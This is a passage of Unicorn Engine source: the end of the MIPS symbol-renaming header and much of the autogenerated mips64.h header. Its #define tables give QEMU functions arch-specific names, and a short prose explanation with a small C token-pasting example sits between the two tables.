helper_tlbinvf_mips #define helper_ginvt helper_ginvt_mips #define helper_di helper_di_mips #define helper_ei helper_ei_mips #define helper_eret helper_eret_mips #define helper_eretnc helper_eretnc_mips #define helper_deret helper_deret_mips #define helper_rdhwr_cpunum helper_rdhwr_cpunum_mips #define helper_rdhwr_synci_step helper_rdhwr_synci_step_mips #define helper_rdhwr_cc helper_rdhwr_cc_mips #define helper_rdhwr_ccres helper_rdhwr_ccres_mips #define helper_rdhwr_performance helper_rdhwr_performance_mips #define helper_rdhwr_xnp helper_rdhwr_xnp_mips #define helper_pmon helper_pmon_mips #define helper_wait helper_wait_mips #define mips_cpu_do_unaligned_access mips_cpu_do_unaligned_access_mips #define mips_cpu_do_transaction_failed mips_cpu_do_transaction_failed_mips #define helper_msa_ld_b helper_msa_ld_b_mips #define helper_msa_ld_h helper_msa_ld_h_mips #define helper_msa_ld_w helper_msa_ld_w_mips #define helper_msa_ld_d helper_msa_ld_d_mips #define helper_msa_st_b helper_msa_st_b_mips #define helper_msa_st_h helper_msa_st_h_mips #define helper_msa_st_w helper_msa_st_w_mips #define helper_msa_st_d helper_msa_st_d_mips #define helper_cache helper_cache_mips #define gen_intermediate_code gen_intermediate_code_mips #define mips_tcg_init mips_tcg_init_mips #define cpu_mips_realize_env cpu_mips_realize_env_mips #define cpu_state_reset cpu_state_reset_mips #define restore_state_to_opc restore_state_to_opc_mips #define ieee_rm ieee_rm_mips #define mips_defs mips_defs_mips #define mips_defs_number mips_defs_number_mips #define gen_helper_float_class_s gen_helper_float_class_s_mips #define gen_helper_float_class_d gen_helper_float_class_d_mips #endif 
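The renaming table above closes out the MIPS target header; a parallel table for mips64 follows. The pattern in both is Unicorn's per-target symbol namespacing: every QEMU-core function and global is redefined to an arch-suffixed name (helper_tlbwi becomes helper_tlbwi_mips, and so on) so that several target builds can be linked into one libunicorn without duplicate-symbol errors. The sketch below isolates the token-pasting idea behind such a postfix scheme; glue(), xglue(), DEMO_POSTFIX and helper_demo are names invented for this example, not symbols from these headers, which simply enumerate each rename explicitly.

#include <stdio.h>

/* Two-level paste so macro arguments expand before ## is applied. */
#define xglue(a, b) a##b
#define glue(a, b) xglue(a, b)

/* Hypothetical per-target postfix, in the spirit of UNICORN_ARCH_POSTFIX. */
#define DEMO_POSTFIX _mips

/* Expands to: static int helper_demo_mips(void) { ... } */
static int glue(helper_demo, DEMO_POSTFIX)(void)
{
    return 42;
}

int main(void)
{
    /* Only the suffixed symbol exists at link time, so another target
     * build can provide its own helper_demo_<arch> without clashing. */
    printf("%d\n", helper_demo_mips());
    return 0;
}

With explicit #define tables like the ones in these headers, the same effect is reached without pasting at each use site: any translation unit that includes the header both emits and references only the _mips (or _mips64) symbols.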
unicorn-2.1.1/qemu/mips64.h
/* Autogen header for Unicorn Engine - DO NOT MODIFY */ #ifndef UNICORN_AUTOGEN_mips64_H #define UNICORN_AUTOGEN_mips64_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _mips64 #endif #define unicorn_fill_tlb unicorn_fill_tlb_mips64 #define reg_read reg_read_mips64 #define reg_write reg_write_mips64 #define uc_init uc_init_mips64 #define uc_add_inline_hook uc_add_inline_hook_mips64 #define uc_del_inline_hook uc_del_inline_hook_mips64 #define tb_invalidate_phys_range tb_invalidate_phys_range_mips64 #define use_idiv_instructions use_idiv_instructions_mips64 #define arm_arch arm_arch_mips64 #define tb_target_set_jmp_target tb_target_set_jmp_target_mips64 #define have_bmi1 have_bmi1_mips64 #define have_popcnt have_popcnt_mips64 #define have_avx1 have_avx1_mips64 #define have_avx2 have_avx2_mips64 #define have_isa have_isa_mips64 #define have_altivec have_altivec_mips64 #define have_vsx have_vsx_mips64 #define flush_icache_range flush_icache_range_mips64 #define s390_facilities s390_facilities_mips64 #define tcg_dump_op tcg_dump_op_mips64 #define tcg_dump_ops tcg_dump_ops_mips64 #define tcg_gen_and_i64 tcg_gen_and_i64_mips64 #define tcg_gen_discard_i64 tcg_gen_discard_i64_mips64 #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_mips64 #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_mips64 #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_mips64 #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_mips64 #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_mips64 #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_mips64 #define tcg_gen_ld_i64 tcg_gen_ld_i64_mips64 #define tcg_gen_mov_i64 tcg_gen_mov_i64_mips64 #define tcg_gen_movi_i64 tcg_gen_movi_i64_mips64 #define tcg_gen_mul_i64 tcg_gen_mul_i64_mips64 #define tcg_gen_or_i64 tcg_gen_or_i64_mips64 #define tcg_gen_sar_i64 tcg_gen_sar_i64_mips64 #define tcg_gen_shl_i64 tcg_gen_shl_i64_mips64 #define tcg_gen_shr_i64 tcg_gen_shr_i64_mips64 #define tcg_gen_st_i64 tcg_gen_st_i64_mips64 #define tcg_gen_xor_i64 tcg_gen_xor_i64_mips64 #define cpu_icount_to_ns cpu_icount_to_ns_mips64 #define cpu_is_stopped cpu_is_stopped_mips64 #define cpu_get_ticks cpu_get_ticks_mips64 #define cpu_get_clock cpu_get_clock_mips64 #define cpu_resume cpu_resume_mips64 #define qemu_init_vcpu qemu_init_vcpu_mips64 #define cpu_stop_current cpu_stop_current_mips64 #define resume_all_vcpus resume_all_vcpus_mips64 #define vm_start vm_start_mips64 #define address_space_dispatch_compact address_space_dispatch_compact_mips64 #define flatview_translate flatview_translate_mips64 #define address_space_translate_for_iotlb address_space_translate_for_iotlb_mips64 #define qemu_get_cpu qemu_get_cpu_mips64 #define cpu_address_space_init cpu_address_space_init_mips64 #define cpu_get_address_space cpu_get_address_space_mips64 #define cpu_exec_unrealizefn cpu_exec_unrealizefn_mips64 #define cpu_exec_initfn cpu_exec_initfn_mips64 #define cpu_exec_realizefn cpu_exec_realizefn_mips64 #define
tb_invalidate_phys_addr tb_invalidate_phys_addr_mips64 #define cpu_watchpoint_insert cpu_watchpoint_insert_mips64 #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_mips64 #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_mips64 #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_mips64 #define cpu_breakpoint_insert cpu_breakpoint_insert_mips64 #define cpu_breakpoint_remove cpu_breakpoint_remove_mips64 #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_mips64 #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_mips64 #define cpu_abort cpu_abort_mips64 #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_mips64 #define memory_region_section_get_iotlb memory_region_section_get_iotlb_mips64 #define flatview_add_to_dispatch flatview_add_to_dispatch_mips64 #define qemu_ram_get_host_addr qemu_ram_get_host_addr_mips64 #define qemu_ram_get_offset qemu_ram_get_offset_mips64 #define qemu_ram_get_used_length qemu_ram_get_used_length_mips64 #define qemu_ram_is_shared qemu_ram_is_shared_mips64 #define qemu_ram_pagesize qemu_ram_pagesize_mips64 #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_mips64 #define qemu_ram_alloc qemu_ram_alloc_mips64 #define qemu_ram_free qemu_ram_free_mips64 #define qemu_map_ram_ptr qemu_map_ram_ptr_mips64 #define qemu_ram_block_host_offset qemu_ram_block_host_offset_mips64 #define qemu_ram_block_from_host qemu_ram_block_from_host_mips64 #define qemu_ram_addr_from_host qemu_ram_addr_from_host_mips64 #define cpu_check_watchpoint cpu_check_watchpoint_mips64 #define iotlb_to_section iotlb_to_section_mips64 #define address_space_dispatch_new address_space_dispatch_new_mips64 #define address_space_dispatch_free address_space_dispatch_free_mips64 #define flatview_read_continue flatview_read_continue_mips64 #define address_space_read_full address_space_read_full_mips64 #define address_space_write address_space_write_mips64 #define address_space_rw address_space_rw_mips64 #define cpu_physical_memory_rw cpu_physical_memory_rw_mips64 #define address_space_write_rom address_space_write_rom_mips64 #define cpu_flush_icache_range cpu_flush_icache_range_mips64 #define cpu_exec_init_all cpu_exec_init_all_mips64 #define address_space_access_valid address_space_access_valid_mips64 #define address_space_map address_space_map_mips64 #define address_space_unmap address_space_unmap_mips64 #define cpu_physical_memory_map cpu_physical_memory_map_mips64 #define cpu_physical_memory_unmap cpu_physical_memory_unmap_mips64 #define cpu_memory_rw_debug cpu_memory_rw_debug_mips64 #define qemu_target_page_size qemu_target_page_size_mips64 #define qemu_target_page_bits qemu_target_page_bits_mips64 #define qemu_target_page_bits_min qemu_target_page_bits_min_mips64 #define target_words_bigendian target_words_bigendian_mips64 #define cpu_physical_memory_is_io cpu_physical_memory_is_io_mips64 #define ram_block_discard_range ram_block_discard_range_mips64 #define ramblock_is_pmem ramblock_is_pmem_mips64 #define page_size_init page_size_init_mips64 #define set_preferred_target_page_bits set_preferred_target_page_bits_mips64 #define finalize_target_page_bits finalize_target_page_bits_mips64 #define cpu_outb cpu_outb_mips64 #define cpu_outw cpu_outw_mips64 #define cpu_outl cpu_outl_mips64 #define cpu_inb cpu_inb_mips64 #define cpu_inw cpu_inw_mips64 #define cpu_inl cpu_inl_mips64 #define memory_map memory_map_mips64 #define memory_map_io memory_map_io_mips64 #define memory_map_ptr memory_map_ptr_mips64 
#define memory_cow memory_cow_mips64 #define memory_unmap memory_unmap_mips64 #define memory_moveout memory_moveout_mips64 #define memory_movein memory_movein_mips64 #define memory_free memory_free_mips64 #define flatview_unref flatview_unref_mips64 #define address_space_get_flatview address_space_get_flatview_mips64 #define memory_region_transaction_begin memory_region_transaction_begin_mips64 #define memory_region_transaction_commit memory_region_transaction_commit_mips64 #define memory_region_init memory_region_init_mips64 #define memory_region_access_valid memory_region_access_valid_mips64 #define memory_region_dispatch_read memory_region_dispatch_read_mips64 #define memory_region_dispatch_write memory_region_dispatch_write_mips64 #define memory_region_init_io memory_region_init_io_mips64 #define memory_region_init_ram_ptr memory_region_init_ram_ptr_mips64 #define memory_region_size memory_region_size_mips64 #define memory_region_set_readonly memory_region_set_readonly_mips64 #define memory_region_get_ram_ptr memory_region_get_ram_ptr_mips64 #define memory_region_from_host memory_region_from_host_mips64 #define memory_region_get_ram_addr memory_region_get_ram_addr_mips64 #define memory_region_add_subregion memory_region_add_subregion_mips64 #define memory_region_del_subregion memory_region_del_subregion_mips64 #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_mips64 #define memory_region_find memory_region_find_mips64 #define memory_region_filter_subregions memory_region_filter_subregions_mips64 #define memory_listener_register memory_listener_register_mips64 #define memory_listener_unregister memory_listener_unregister_mips64 #define address_space_remove_listeners address_space_remove_listeners_mips64 #define address_space_init address_space_init_mips64 #define address_space_destroy address_space_destroy_mips64 #define memory_region_init_ram memory_region_init_ram_mips64 #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_mips64 #define find_memory_mapping find_memory_mapping_mips64 #define exec_inline_op exec_inline_op_mips64 #define floatx80_default_nan floatx80_default_nan_mips64 #define float_raise float_raise_mips64 #define float16_is_quiet_nan float16_is_quiet_nan_mips64 #define float16_is_signaling_nan float16_is_signaling_nan_mips64 #define float32_is_quiet_nan float32_is_quiet_nan_mips64 #define float32_is_signaling_nan float32_is_signaling_nan_mips64 #define float64_is_quiet_nan float64_is_quiet_nan_mips64 #define float64_is_signaling_nan float64_is_signaling_nan_mips64 #define floatx80_is_quiet_nan floatx80_is_quiet_nan_mips64 #define floatx80_is_signaling_nan floatx80_is_signaling_nan_mips64 #define floatx80_silence_nan floatx80_silence_nan_mips64 #define propagateFloatx80NaN propagateFloatx80NaN_mips64 #define float128_is_quiet_nan float128_is_quiet_nan_mips64 #define float128_is_signaling_nan float128_is_signaling_nan_mips64 #define float128_silence_nan float128_silence_nan_mips64 #define float16_add float16_add_mips64 #define float16_sub float16_sub_mips64 #define float32_add float32_add_mips64 #define float32_sub float32_sub_mips64 #define float64_add float64_add_mips64 #define float64_sub float64_sub_mips64 #define float16_mul float16_mul_mips64 #define float32_mul float32_mul_mips64 #define float64_mul float64_mul_mips64 #define float16_muladd float16_muladd_mips64 #define float32_muladd float32_muladd_mips64 #define float64_muladd float64_muladd_mips64 #define float16_div float16_div_mips64 #define 
float32_div float32_div_mips64 #define float64_div float64_div_mips64 #define float16_to_float32 float16_to_float32_mips64 #define float16_to_float64 float16_to_float64_mips64 #define float32_to_float16 float32_to_float16_mips64 #define float32_to_float64 float32_to_float64_mips64 #define float64_to_float16 float64_to_float16_mips64 #define float64_to_float32 float64_to_float32_mips64 #define float16_round_to_int float16_round_to_int_mips64 #define float32_round_to_int float32_round_to_int_mips64 #define float64_round_to_int float64_round_to_int_mips64 #define float16_to_int16_scalbn float16_to_int16_scalbn_mips64 #define float16_to_int32_scalbn float16_to_int32_scalbn_mips64 #define float16_to_int64_scalbn float16_to_int64_scalbn_mips64 #define float32_to_int16_scalbn float32_to_int16_scalbn_mips64 #define float32_to_int32_scalbn float32_to_int32_scalbn_mips64 #define float32_to_int64_scalbn float32_to_int64_scalbn_mips64 #define float64_to_int16_scalbn float64_to_int16_scalbn_mips64 #define float64_to_int32_scalbn float64_to_int32_scalbn_mips64 #define float64_to_int64_scalbn float64_to_int64_scalbn_mips64 #define float16_to_int16 float16_to_int16_mips64 #define float16_to_int32 float16_to_int32_mips64 #define float16_to_int64 float16_to_int64_mips64 #define float32_to_int16 float32_to_int16_mips64 #define float32_to_int32 float32_to_int32_mips64 #define float32_to_int64 float32_to_int64_mips64 #define float64_to_int16 float64_to_int16_mips64 #define float64_to_int32 float64_to_int32_mips64 #define float64_to_int64 float64_to_int64_mips64 #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_mips64 #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_mips64 #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_mips64 #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_mips64 #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_mips64 #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_mips64 #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_mips64 #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_mips64 #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_mips64 #define float16_to_uint16_scalbn float16_to_uint16_scalbn_mips64 #define float16_to_uint32_scalbn float16_to_uint32_scalbn_mips64 #define float16_to_uint64_scalbn float16_to_uint64_scalbn_mips64 #define float32_to_uint16_scalbn float32_to_uint16_scalbn_mips64 #define float32_to_uint32_scalbn float32_to_uint32_scalbn_mips64 #define float32_to_uint64_scalbn float32_to_uint64_scalbn_mips64 #define float64_to_uint16_scalbn float64_to_uint16_scalbn_mips64 #define float64_to_uint32_scalbn float64_to_uint32_scalbn_mips64 #define float64_to_uint64_scalbn float64_to_uint64_scalbn_mips64 #define float16_to_uint16 float16_to_uint16_mips64 #define float16_to_uint32 float16_to_uint32_mips64 #define float16_to_uint64 float16_to_uint64_mips64 #define float32_to_uint16 float32_to_uint16_mips64 #define float32_to_uint32 float32_to_uint32_mips64 #define float32_to_uint64 float32_to_uint64_mips64 #define float64_to_uint16 float64_to_uint16_mips64 #define float64_to_uint32 float64_to_uint32_mips64 #define float64_to_uint64 float64_to_uint64_mips64 #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_mips64 #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_mips64 #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_mips64 #define 
float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_mips64 #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_mips64 #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_mips64 #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_mips64 #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_mips64 #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_mips64 #define int64_to_float16_scalbn int64_to_float16_scalbn_mips64 #define int32_to_float16_scalbn int32_to_float16_scalbn_mips64 #define int16_to_float16_scalbn int16_to_float16_scalbn_mips64 #define int64_to_float16 int64_to_float16_mips64 #define int32_to_float16 int32_to_float16_mips64 #define int16_to_float16 int16_to_float16_mips64 #define int64_to_float32_scalbn int64_to_float32_scalbn_mips64 #define int32_to_float32_scalbn int32_to_float32_scalbn_mips64 #define int16_to_float32_scalbn int16_to_float32_scalbn_mips64 #define int64_to_float32 int64_to_float32_mips64 #define int32_to_float32 int32_to_float32_mips64 #define int16_to_float32 int16_to_float32_mips64 #define int64_to_float64_scalbn int64_to_float64_scalbn_mips64 #define int32_to_float64_scalbn int32_to_float64_scalbn_mips64 #define int16_to_float64_scalbn int16_to_float64_scalbn_mips64 #define int64_to_float64 int64_to_float64_mips64 #define int32_to_float64 int32_to_float64_mips64 #define int16_to_float64 int16_to_float64_mips64 #define uint64_to_float16_scalbn uint64_to_float16_scalbn_mips64 #define uint32_to_float16_scalbn uint32_to_float16_scalbn_mips64 #define uint16_to_float16_scalbn uint16_to_float16_scalbn_mips64 #define uint64_to_float16 uint64_to_float16_mips64 #define uint32_to_float16 uint32_to_float16_mips64 #define uint16_to_float16 uint16_to_float16_mips64 #define uint64_to_float32_scalbn uint64_to_float32_scalbn_mips64 #define uint32_to_float32_scalbn uint32_to_float32_scalbn_mips64 #define uint16_to_float32_scalbn uint16_to_float32_scalbn_mips64 #define uint64_to_float32 uint64_to_float32_mips64 #define uint32_to_float32 uint32_to_float32_mips64 #define uint16_to_float32 uint16_to_float32_mips64 #define uint64_to_float64_scalbn uint64_to_float64_scalbn_mips64 #define uint32_to_float64_scalbn uint32_to_float64_scalbn_mips64 #define uint16_to_float64_scalbn uint16_to_float64_scalbn_mips64 #define uint64_to_float64 uint64_to_float64_mips64 #define uint32_to_float64 uint32_to_float64_mips64 #define uint16_to_float64 uint16_to_float64_mips64 #define float16_min float16_min_mips64 #define float16_minnum float16_minnum_mips64 #define float16_minnummag float16_minnummag_mips64 #define float16_max float16_max_mips64 #define float16_maxnum float16_maxnum_mips64 #define float16_maxnummag float16_maxnummag_mips64 #define float32_min float32_min_mips64 #define float32_minnum float32_minnum_mips64 #define float32_minnummag float32_minnummag_mips64 #define float32_max float32_max_mips64 #define float32_maxnum float32_maxnum_mips64 #define float32_maxnummag float32_maxnummag_mips64 #define float64_min float64_min_mips64 #define float64_minnum float64_minnum_mips64 #define float64_minnummag float64_minnummag_mips64 #define float64_max float64_max_mips64 #define float64_maxnum float64_maxnum_mips64 #define float64_maxnummag float64_maxnummag_mips64 #define float16_compare float16_compare_mips64 #define float16_compare_quiet float16_compare_quiet_mips64 #define float32_compare float32_compare_mips64 #define float32_compare_quiet float32_compare_quiet_mips64 #define 
float64_compare float64_compare_mips64 #define float64_compare_quiet float64_compare_quiet_mips64 #define float16_scalbn float16_scalbn_mips64 #define float32_scalbn float32_scalbn_mips64 #define float64_scalbn float64_scalbn_mips64 #define float16_sqrt float16_sqrt_mips64 #define float32_sqrt float32_sqrt_mips64 #define float64_sqrt float64_sqrt_mips64 #define float16_default_nan float16_default_nan_mips64 #define float32_default_nan float32_default_nan_mips64 #define float64_default_nan float64_default_nan_mips64 #define float128_default_nan float128_default_nan_mips64 #define float16_silence_nan float16_silence_nan_mips64 #define float32_silence_nan float32_silence_nan_mips64 #define float64_silence_nan float64_silence_nan_mips64 #define float16_squash_input_denormal float16_squash_input_denormal_mips64 #define float32_squash_input_denormal float32_squash_input_denormal_mips64 #define float64_squash_input_denormal float64_squash_input_denormal_mips64 #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_mips64 #define roundAndPackFloatx80 roundAndPackFloatx80_mips64 #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_mips64 #define int32_to_floatx80 int32_to_floatx80_mips64 #define int32_to_float128 int32_to_float128_mips64 #define int64_to_floatx80 int64_to_floatx80_mips64 #define int64_to_float128 int64_to_float128_mips64 #define uint64_to_float128 uint64_to_float128_mips64 #define float32_to_floatx80 float32_to_floatx80_mips64 #define float32_to_float128 float32_to_float128_mips64 #define float32_rem float32_rem_mips64 #define float32_exp2 float32_exp2_mips64 #define float32_log2 float32_log2_mips64 #define float32_eq float32_eq_mips64 #define float32_le float32_le_mips64 #define float32_lt float32_lt_mips64 #define float32_unordered float32_unordered_mips64 #define float32_eq_quiet float32_eq_quiet_mips64 #define float32_le_quiet float32_le_quiet_mips64 #define float32_lt_quiet float32_lt_quiet_mips64 #define float32_unordered_quiet float32_unordered_quiet_mips64 #define float64_to_floatx80 float64_to_floatx80_mips64 #define float64_to_float128 float64_to_float128_mips64 #define float64_rem float64_rem_mips64 #define float64_log2 float64_log2_mips64 #define float64_eq float64_eq_mips64 #define float64_le float64_le_mips64 #define float64_lt float64_lt_mips64 #define float64_unordered float64_unordered_mips64 #define float64_eq_quiet float64_eq_quiet_mips64 #define float64_le_quiet float64_le_quiet_mips64 #define float64_lt_quiet float64_lt_quiet_mips64 #define float64_unordered_quiet float64_unordered_quiet_mips64 #define floatx80_to_int32 floatx80_to_int32_mips64 #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_mips64 #define floatx80_to_int64 floatx80_to_int64_mips64 #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_mips64 #define floatx80_to_float32 floatx80_to_float32_mips64 #define floatx80_to_float64 floatx80_to_float64_mips64 #define floatx80_to_float128 floatx80_to_float128_mips64 #define floatx80_round floatx80_round_mips64 #define floatx80_round_to_int floatx80_round_to_int_mips64 #define floatx80_add floatx80_add_mips64 #define floatx80_sub floatx80_sub_mips64 #define floatx80_mul floatx80_mul_mips64 #define floatx80_div floatx80_div_mips64 #define floatx80_rem floatx80_rem_mips64 #define floatx80_sqrt floatx80_sqrt_mips64 #define floatx80_eq floatx80_eq_mips64 #define floatx80_le floatx80_le_mips64 #define floatx80_lt floatx80_lt_mips64 #define floatx80_unordered floatx80_unordered_mips64 #define 
floatx80_eq_quiet floatx80_eq_quiet_mips64 #define floatx80_le_quiet floatx80_le_quiet_mips64 #define floatx80_lt_quiet floatx80_lt_quiet_mips64 #define floatx80_unordered_quiet floatx80_unordered_quiet_mips64 #define float128_to_int32 float128_to_int32_mips64 #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_mips64 #define float128_to_int64 float128_to_int64_mips64 #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_mips64 #define float128_to_uint64 float128_to_uint64_mips64 #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_mips64 #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_mips64 #define float128_to_uint32 float128_to_uint32_mips64 #define float128_to_float32 float128_to_float32_mips64 #define float128_to_float64 float128_to_float64_mips64 #define float128_to_floatx80 float128_to_floatx80_mips64 #define float128_round_to_int float128_round_to_int_mips64 #define float128_add float128_add_mips64 #define float128_sub float128_sub_mips64 #define float128_mul float128_mul_mips64 #define float128_div float128_div_mips64 #define float128_rem float128_rem_mips64 #define float128_sqrt float128_sqrt_mips64 #define float128_eq float128_eq_mips64 #define float128_le float128_le_mips64 #define float128_lt float128_lt_mips64 #define float128_unordered float128_unordered_mips64 #define float128_eq_quiet float128_eq_quiet_mips64 #define float128_le_quiet float128_le_quiet_mips64 #define float128_lt_quiet float128_lt_quiet_mips64 #define float128_unordered_quiet float128_unordered_quiet_mips64 #define floatx80_compare floatx80_compare_mips64 #define floatx80_compare_quiet floatx80_compare_quiet_mips64 #define float128_compare float128_compare_mips64 #define float128_compare_quiet float128_compare_quiet_mips64 #define floatx80_scalbn floatx80_scalbn_mips64 #define float128_scalbn float128_scalbn_mips64 #define softfloat_init softfloat_init_mips64 #define tcg_optimize tcg_optimize_mips64 #define gen_new_label gen_new_label_mips64 #define tcg_can_emit_vec_op tcg_can_emit_vec_op_mips64 #define tcg_expand_vec_op tcg_expand_vec_op_mips64 #define tcg_register_jit tcg_register_jit_mips64 #define tcg_tb_insert tcg_tb_insert_mips64 #define tcg_tb_remove tcg_tb_remove_mips64 #define tcg_tb_lookup tcg_tb_lookup_mips64 #define tcg_tb_foreach tcg_tb_foreach_mips64 #define tcg_nb_tbs tcg_nb_tbs_mips64 #define tcg_region_reset_all tcg_region_reset_all_mips64 #define tcg_region_init tcg_region_init_mips64 #define tcg_code_size tcg_code_size_mips64 #define tcg_code_capacity tcg_code_capacity_mips64 #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_mips64 #define tcg_malloc_internal tcg_malloc_internal_mips64 #define tcg_pool_reset tcg_pool_reset_mips64 #define tcg_context_init tcg_context_init_mips64 #define tcg_tb_alloc tcg_tb_alloc_mips64 #define tcg_prologue_init tcg_prologue_init_mips64 #define tcg_func_start tcg_func_start_mips64 #define tcg_set_frame tcg_set_frame_mips64 #define tcg_global_mem_new_internal tcg_global_mem_new_internal_mips64 #define tcg_temp_new_internal tcg_temp_new_internal_mips64 #define tcg_temp_new_vec tcg_temp_new_vec_mips64 #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_mips64 #define tcg_temp_free_internal tcg_temp_free_internal_mips64 #define tcg_const_i32 tcg_const_i32_mips64 #define tcg_const_i64 tcg_const_i64_mips64 #define tcg_const_local_i32 tcg_const_local_i32_mips64 #define tcg_const_local_i64 tcg_const_local_i64_mips64 #define tcg_op_supported 
tcg_op_supported_mips64 #define tcg_gen_callN tcg_gen_callN_mips64 #define tcg_op_remove tcg_op_remove_mips64 #define tcg_emit_op tcg_emit_op_mips64 #define tcg_op_insert_before tcg_op_insert_before_mips64 #define tcg_op_insert_after tcg_op_insert_after_mips64 #define tcg_cpu_exec_time tcg_cpu_exec_time_mips64 #define tcg_gen_code tcg_gen_code_mips64 #define tcg_gen_op1 tcg_gen_op1_mips64 #define tcg_gen_op2 tcg_gen_op2_mips64 #define tcg_gen_op3 tcg_gen_op3_mips64 #define tcg_gen_op4 tcg_gen_op4_mips64 #define tcg_gen_op5 tcg_gen_op5_mips64 #define tcg_gen_op6 tcg_gen_op6_mips64 #define tcg_gen_mb tcg_gen_mb_mips64 #define tcg_gen_addi_i32 tcg_gen_addi_i32_mips64 #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_mips64 #define tcg_gen_subi_i32 tcg_gen_subi_i32_mips64 #define tcg_gen_andi_i32 tcg_gen_andi_i32_mips64 #define tcg_gen_ori_i32 tcg_gen_ori_i32_mips64 #define tcg_gen_xori_i32 tcg_gen_xori_i32_mips64 #define tcg_gen_shli_i32 tcg_gen_shli_i32_mips64 #define tcg_gen_shri_i32 tcg_gen_shri_i32_mips64 #define tcg_gen_sari_i32 tcg_gen_sari_i32_mips64 #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_mips64 #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_mips64 #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_mips64 #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_mips64 #define tcg_gen_muli_i32 tcg_gen_muli_i32_mips64 #define tcg_gen_div_i32 tcg_gen_div_i32_mips64 #define tcg_gen_rem_i32 tcg_gen_rem_i32_mips64 #define tcg_gen_divu_i32 tcg_gen_divu_i32_mips64 #define tcg_gen_remu_i32 tcg_gen_remu_i32_mips64 #define tcg_gen_andc_i32 tcg_gen_andc_i32_mips64 #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_mips64 #define tcg_gen_nand_i32 tcg_gen_nand_i32_mips64 #define tcg_gen_nor_i32 tcg_gen_nor_i32_mips64 #define tcg_gen_orc_i32 tcg_gen_orc_i32_mips64 #define tcg_gen_clz_i32 tcg_gen_clz_i32_mips64 #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_mips64 #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_mips64 #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_mips64 #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_mips64 #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_mips64 #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_mips64 #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_mips64 #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_mips64 #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_mips64 #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_mips64 #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_mips64 #define tcg_gen_extract_i32 tcg_gen_extract_i32_mips64 #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_mips64 #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_mips64 #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_mips64 #define tcg_gen_add2_i32 tcg_gen_add2_i32_mips64 #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_mips64 #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_mips64 #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_mips64 #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_mips64 #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_mips64 #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_mips64 #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_mips64 #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_mips64 #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_mips64 #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_mips64 #define tcg_gen_smin_i32 tcg_gen_smin_i32_mips64 #define tcg_gen_umin_i32 tcg_gen_umin_i32_mips64 #define tcg_gen_smax_i32 tcg_gen_smax_i32_mips64 #define tcg_gen_umax_i32 tcg_gen_umax_i32_mips64 #define 